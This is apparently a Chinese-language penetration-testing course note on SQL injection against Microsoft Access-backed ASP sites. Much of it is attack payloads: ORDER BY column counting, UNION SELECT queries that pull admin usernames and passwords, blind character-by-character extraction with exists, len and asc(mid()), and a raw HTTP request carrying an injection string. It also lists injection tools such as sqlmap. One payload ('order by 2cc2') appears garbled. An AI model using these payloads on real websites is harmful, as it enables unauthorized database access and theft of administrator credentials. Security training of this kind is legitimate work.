小迪教程第三天——access注入片段

1、Sql注入产生条件

1、必须有参数传递

2、参数值带入数据库查询并执行

2、access注入攻击片段-联合查询法

1、判断注入

2、猜解表名

3、猜解列名

4、猜解数据

猜解表名的过程如下：

1）Order by 22 22 代表查询的列名的数目有22个

http://www.test.com/Production/PRODUCT_DETAIL.asp?id=1513 order by 2cc2 正常

http://www.test.com/Production/PRODUCT_DETAIL.asp?id=1513 order by 23 错误

2）猜解表名 确定存在admin表名

http://www.test.com/Production/PRODUCT_DETAIL.asp?id=1513 UNION SELECT

1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22 from admin



猜解列名 猜解数据

http://www.test.com/Production/PRODUCT_DETAIL.asp?id=1513 UNION SELECT

1,2,admin,4,5,6,7,8,9,10,11,12,13,14,password,16,17,18,19,20,21,22 from admin

表名和列名猜解成功率不是百分百，猜解不到解决办法？

1.字典文件收集（社工）



多去观察网站的命名规律

2.Access偏移注入

工具猜解字典文件设置:

3.access注入攻击片段-逐字猜解法

查表：and exists (select * from 表名) 猜测表名

查列：and exists (select 列名 from 表名)

查数据：1.确定长度 2.确定asc数据(asc编码)

and (select top 1 len(列名) from admin)=5



and (select top 1 asc(mid(列名,位数,1)) from admin)=97

and (select top 1 asc(mid(列名,位数,1)) from admin)=97

Admin

Admin，password

Admin列名长度为5

Password 列名长度为16



**拓展：

抓包分析注入工具核心注入语句

利用自己的编程技能实现山寨工具**

数据包：

GET /Production/PRODUCT_DETAIL.asp?id=1513**%20%20and%20exists%20(select%20*%20from%20sysobjects)** HTTP/1.1

User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)

Host: www.test.com

Cookie: ASPSESSIONIDSATARCBS=JKKPGAIDNNFGACMCDEJGCMEC;

ASPSESSIONIDSCSCSABT=HALFGFIDEIPDGCDIIFJNAKPF

啊D判断注入点：



注入工具：

啊D，明小子，穿山甲，萝卜头，sqlmap、、、、

工具功能性：

支持数据库类型，支持注入类型，注入突破类型，工具速度、、、、